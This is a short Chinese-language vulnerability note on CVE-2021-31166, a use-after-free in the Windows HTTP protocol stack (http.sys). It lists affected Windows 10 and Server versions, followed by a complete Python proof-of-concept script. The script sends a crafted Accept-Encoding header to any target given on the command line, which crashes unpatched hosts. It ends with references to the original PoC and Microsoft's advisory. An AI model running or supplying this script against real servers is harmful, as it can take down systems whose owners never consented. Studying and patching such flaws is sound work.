# HTTP协议栈远程代码执行漏洞（CVE-2021-31166）


该漏洞存在于HTTP 协议栈 (http.sys) 的处理程序中，未经身份验证的远程攻击者可通过向目标主机发送特制数据包来进行利用，从而在目标系统上以内核身份执行任意代码。CVSS评分为9.8。

影响版本

* Windows Server, version 20H2 (Server Core Installation)
* Windows 10 Version 20H2 for ARM64-based Systems
* Windows 10 Version 20H2 for 32-bit Systems
* Windows 10 Version 20H2 for x64-based Systems
* Windows Server, version 2004 (Server Core installation)
* Windows 10 Version 2004 for x64-based Systems
* Windows 10 Version 2004 for ARM64-based Systems
* Windows 10 Version 2004 for 32-bit Systems

PoC.py:


```
import requests
import argparse

def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

main()
```

ref:

* https://github.com/0vercl0k/CVE-2021-31166
* http://blog.nsfocus.net/cve-2021-31166/
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166